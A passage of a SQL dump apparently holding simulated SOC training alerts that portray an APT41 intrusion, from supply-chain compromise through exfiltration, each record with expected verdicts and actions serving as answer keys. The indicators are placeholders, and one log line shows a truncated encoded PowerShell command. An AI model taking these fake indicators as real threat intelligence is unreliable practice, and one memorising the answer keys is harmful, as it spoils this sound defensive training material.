3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:52:23Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-1001\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"johndoe\\\",\\\"exfiltrated_files\\\":[\\\"nuclear_policy_draft.docx\\\",\\\"email_correspondence_2023.eml\\\"],\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_extension_id\\\":\\\"kimsuky_extension_123\\\",\\\"c2_server\\\":\\\"malicious.kimsuky.org\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.012Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:52:23Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-1001\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"johndoe\\\",\\\"exfiltrated_files\\\":[\\\"nuclear_policy_draft.docx\\\",\\\"email_correspondence_2023.eml\\\"],\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_extension_id\\\":\\\"kimsuky_extension_123\\\",\\\"c2_server\\\":\\\"malicious.kimsuky.org\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(408, 'Initial Access via Supply Chain Compromise', 'high', 'Network Intrusion Detection System', 'APT41 has initiated an operation by exploiting a vulnerability in a third-party software update, gaining initial access to the targeted gaming company\'s network.', 'Supply Chain Attack', 'T1195.002 - Software Supply Chain', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:32Z\",\"event_id\":\"EVT-2023-20145\",\"source_ip\":\"198.51.100.14\",\"destination_ip\":\"10.0.5.25\",\"filename\":\"CCleaner_Update_v5.7.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"alert_name\":\"Suspicious Software Update\",\"user\":\"update_service\",\"description\":\"Detected a potentially malicious software update from a third-party provider.\"}', '2026-01-04 02:21:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.14\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous APT41 campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"CCleaner_Update_v5.7.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"File associated with supply chain attacks targeting software updates.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware variant used by APT41.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(409, 'Execution of Backdoor Malware', 'high', 'Endpoint Detection and Response', 'After gaining initial access, APT41 executes a custom backdoor, allowing them to control compromised systems remotely. The malware deployment was detected via an anomaly in the execution patterns on a critical server.', 'Malware Deployment', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:01Z\",\"event_id\":\"EVT-2023-1023\",\"source_ip\":\"203.0.113.44\",\"destination_ip\":\"192.168.1.10\",\"user\":\"admin\",\"process_name\":\"svchost.exe\",\"malware_name\":\"APT41_Custom_Backdoor\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"backdoor.dll\",\"severity\":\"High\",\"action_taken\":\"Quarantine\"}', '2026-01-04 02:21:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.44\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple APT41 campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Critical server within the corporate network\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as known APT41 malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"malicious\",\"details\":\"Suspicious DLL associated with backdoor activities\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 
'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(410, 'Establishing Persistence with Rootkit', 'high', 'Host-based Intrusion Prevention System', 'APT41 has installed a rootkit on a key server to ensure long-term access and resist detection. This activity is part of their advanced tactics to maintain persistent access within the network.', 'Persistence Mechanism', 'T1014 - Rootkit', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:46:23Z\",\"event_id\":\"HIPS-2023-5567\",\"host_ip\":\"192.168.1.10\",\"detected_action\":\"Rootkit Installation\",\"malware_name\":\"APT41_Rootkit\",\"file_path\":\"/usr/local/bin/apt41_rootkit\",\"file_hash\":\"3a5f1d7b8ee1b9c3c0a8a9c512345678\",\"attacker_ip\":\"203.0.113.45\",\"detected_by\":\"HIPS\",\"username\":\"sysadmin\",\"additional_info\":{\"rootkit_persistence\":true,\"kernel_modification\":true}}', '2026-01-04 02:21:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Confirmed malicious IP associated with APT41 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3a5f1d7b8ee1b9c3c0a8a9c512345678\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Service\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known APT41 rootkit sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/usr/local/bin/apt41_rootkit\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Filename associated with APT41 rootkit persistence mechanism.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"sysadmin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account with elevated 
privileges.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.015Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:46:23Z\\\",\\\"event_id\\\":\\\"HIPS-2023-5567\\\",\\\"host_ip\\\":\\\"192.168.1.10\\\",\\\"detected_action\\\":\\\"Rootkit Installation\\\",\\\"malware_name\\\":\\\"APT41_Rootkit\\\",\\\"file_path\\\":\\\"/usr/local/bin/apt41_rootkit\\\",\\\"file_hash\\\":\\\"3a5f1d7b8ee1b9c3c0a8a9c512345678\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"detected_by\\\":\\\"HIPS\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"additional_info\\\":{\\\"rootkit_persistence\\\":true,\\\"kernel_modification\\\":true}}\"},{\"timestamp\":\"2026-02-01T20:31:19.015Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:46:23Z\\\",\\\"event_id\\\":\\\"HIPS-2023-5567\\\",\\\"host_ip\\\":\\\"192.168.1.10\\\",\\\"detected_action\\\":\\\"Rootkit Installation\\\",\\\"malware_name\\\":\\\"APT41_Rootkit\\\",\\\"file_path\\\":\\\"/usr/local/bin/apt41_rootkit\\\",\\\"file_hash\\\":\\\"3a5f1d7b8ee1b9c3c0a8a9c512345678\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"detected_by\\\":\\\"HIPS\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"additional_info\\\":{\\\"rootkit_persistence\\\":true,\\\"kernel_modification\\\":true}}\"},{\"timestamp\":\"2026-02-01T20:30:19.015Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:46:23Z\\\",\\\"event_id\\\":\\\"HIPS-2023-5567\\\",\\\"host_ip\\\":\\\"192.168.1.10\\\",\\\"detected_action\\\":\\\"Rootkit Installation\\\",\\\"malware_name\\\":\\\"APT41_Rootkit\\\",\\\"file_path\\\":\\\"/usr/local/bin/apt41_rootkit\\\",\\\"file_hash\\\":\\\"3a5f1d7b8ee1b9c3c0a8a9c512345678\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"detected_by\\\":\\\"HIPS\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"additional_info\\\":{\\\"rootkit_persistence\\\":true,\\\"kernel_modification\\\":true}}\"},{\"timestamp\":\"2026-02-01T20:29:19.015Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:46:23Z\\\",\\\"event_id\\\":\\\"HIPS-2023-5567\\\",\\\"host_ip\\\":\\\"192.168.1.10\\\",\\\"detected_action\\\":\\\"Rootkit Installation\\\",\\\"malware_name\\\":\\\"APT41_Rootkit\\\",\\\"file_path\\\":\\\"/usr/local/bin/apt41_rootkit\\\",\\\"file_hash\\\":\\\"3a5f1d7b8ee1b9c3c0a8a9c512345678\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"detected_by\\\":\\\"HIPS\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"additional_info\\\":{\\\"rootkit_persistence\\\":true,\\\"kernel_modification\\\":true}}\"},{\"timestamp\":\"2026-02-01T20:28:19.015Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:46:23Z\\\",\\\"event_id\\\":\\\"HIPS-2023-5567\\\",\\\"host_ip\\\":\\\"192.168.1.10\\\",\\\"detected_action\\\":\\\"Rootkit 
Installation\\\",\\\"malware_name\\\":\\\"APT41_Rootkit\\\",\\\"file_path\\\":\\\"/usr/local/bin/apt41_rootkit\\\",\\\"file_hash\\\":\\\"3a5f1d7b8ee1b9c3c0a8a9c512345678\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"detected_by\\\":\\\"HIPS\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"additional_info\\\":{\\\"rootkit_persistence\\\":true,\\\"kernel_modification\\\":true}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(411, 'Lateral Movement to PII Databases', 'critical', 'Security Information and Event Management', 'APT41 has successfully utilized harvested credentials to move laterally within the network, specifically targeting databases containing PII.', 'Credential Dumping', 'T1003', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:32:47Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"compromised_user\",\"action\":\"lateral_movement\",\"tool\":\"Mimikatz\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"mimilib.dll\",\"event_description\":\"Failed login attempt detected on database server with potential credential dumping activity.\",\"additional_info\":{\"failed_logins\":5,\"successful_logins\":1,\"target_database\":\"PII_DB_01\"}}', '2026-01-04 02:21:52', '2026-02-17 05:23:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with APT41 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal database server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory Logs\",\"verdict\":\"suspicious\",\"details\":\"Account recently accessed from multiple foreign IPs.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mimikatz tool.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"mimilib.dll\",\"is_critical\":false,\"osint_result\":{\"source\":\"File 
Analysis\",\"verdict\":\"malicious\",\"details\":\"File used by Mimikatz for credential dumping.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.016Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:47Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"lateral_movement\\\",\\\"tool\\\":\\\"Mimikatz\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"mimilib.dll\\\",\\\"event_description\\\":\\\"Failed login attempt detected on database server with potential credential dumping activity.\\\",\\\"additional_info\\\":{\\\"failed_logins\\\":5,\\\"successful_logins\\\":1,\\\"target_database\\\":\\\"PII_DB_01\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:19.016Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:47Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"lateral_movement\\\",\\\"tool\\\":\\\"Mimikatz\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"mimilib.dll\\\",\\\"event_description\\\":\\\"Failed login attempt detected on database server with potential credential dumping 
activity.\\\",\\\"additional_info\\\":{\\\"failed_logins\\\":5,\\\"successful_logins\\\":1,\\\"target_database\\\":\\\"PII_DB_01\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:19.016Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:47Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"lateral_movement\\\",\\\"tool\\\":\\\"Mimikatz\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"mimilib.dll\\\",\\\"event_description\\\":\\\"Failed login attempt detected on database server with potential credential dumping activity.\\\",\\\"additional_info\\\":{\\\"failed_logins\\\":5,\\\"successful_logins\\\":1,\\\"target_database\\\":\\\"PII_DB_01\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:19.016Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:47Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"lateral_movement\\\",\\\"tool\\\":\\\"Mimikatz\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"mimilib.dll\\\",\\\"event_description\\\":\\\"Failed login attempt detected on database server with potential credential dumping activity.\\\",\\\"additional_info\\\":{\\\"failed_logins\\\":5,\\\"successful_logins\\\":1,\\\"target_database\\\":\\\"PII_DB_01\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:19.016Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:47Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"lateral_movement\\\",\\\"tool\\\":\\\"Mimikatz\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"mimilib.dll\\\",\\\"event_description\\\":\\\"Failed login attempt detected on database server with potential credential dumping activity.\\\",\\\"additional_info\\\":{\\\"failed_logins\\\":5,\\\"successful_logins\\\":1,\\\"target_database\\\":\\\"PII_DB_01\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(412, 'Exfiltration of Game Source Code and PII', 'critical', 'Data Loss Prevention', 'APT41 successfully exfiltrated sensitive game source code and PII. This marks the completion of their dual-mode operation focused on both commercial and strategic gains.', 'Data Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-01T14:32:00Z\",\"event_id\":\"EXFIL-2023-5276\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.15\",\"action\":\"ALLOW\",\"protocol\":\"HTTPS\",\"file_name\":\"game_source_code_v1.0.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"jdoe\",\"url\":\"https://malicious-domain.com/upload\",\"data_volume\":\"15GB\",\"comments\":\"Data exfiltration detected via secured channel; source code and PII files identified.\"}', '2026-01-04 02:21:52', '2026-02-17 22:37:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"external threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known APT41 command and control server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Malicious file associated with APT41 operations.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"https://malicious-domain.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"URL associated with data exfiltration 
activities.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"game_source_code_v1.0.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal analysis\",\"verdict\":\"malicious\",\"details\":\"Exfiltrated file containing sensitive game source code.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.017Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:32:00Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-5276\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"action\\\":\\\"ALLOW\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"game_source_code_v1.0.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"url\\\":\\\"https://malicious-domain.com/upload\\\",\\\"data_volume\\\":\\\"15GB\\\",\\\"comments\\\":\\\"Data exfiltration detected via secured channel; source code and PII files identified.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.017Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:32:00Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-5276\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"action\\\":\\\"ALLOW\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"game_source_code_v1.0.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"url\\\":\\\"https://malicious-domain.com/upload\\\",\\\"data_volume\\\":\\\"15GB\\\",\\\"comments\\\":\\\"Data exfiltration detected via secured channel; source code and PII files identified.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.017Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:32:00Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-5276\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"action\\\":\\\"ALLOW\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"game_source_code_v1.0.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"url\\\":\\\"https://malicious-domain.com/upload\\\",\\\"data_volume\\\":\\\"15GB\\\",\\\"comments\\\":\\\"Data exfiltration detected via secured channel; source code and PII files identified.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.017Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:32:00Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-5276\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"action\\\":\\\"ALLOW\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"game_source_code_v1.0.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"url\\\":\\\"https://malicious-domain.com/upload\\\",\\\"data_volume\\\":\\\"15GB\\\",\\\"comments\\\":\\\"Data exfiltration detected via secured channel; source code and PII files identified.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.017Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:32:00Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-5276\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"action\\\":\\\"ALLOW\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"game_source_code_v1.0.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"url\\\":\\\"https://malicious-domain.com/upload\\\",\\\"data_volume\\\":\\\"15GB\\\",\\\"comments\\\":\\\"Data exfiltration detected via secured channel; source code and PII files identified.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(413, 'Supply Chain Compromise Detected', 'high', 'Network Intrusion Detection System (NIDS)', 'Anomalous network activity detected indicating a potential supply chain compromise. The malicious code was inserted into a popular software update by APT41, exploiting the company\'s reliance on the software to gain a foothold in the network.', 'Supply Chain Attack', 'T1195.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"198.51.100.23\",\"destination_ip\":\"192.168.1.10\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"filename\":\"update_v1.23.4.exe\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"alert_id\":\"NIDS-20231015-0001\"}', '2026-01-04 04:11:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT41 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset 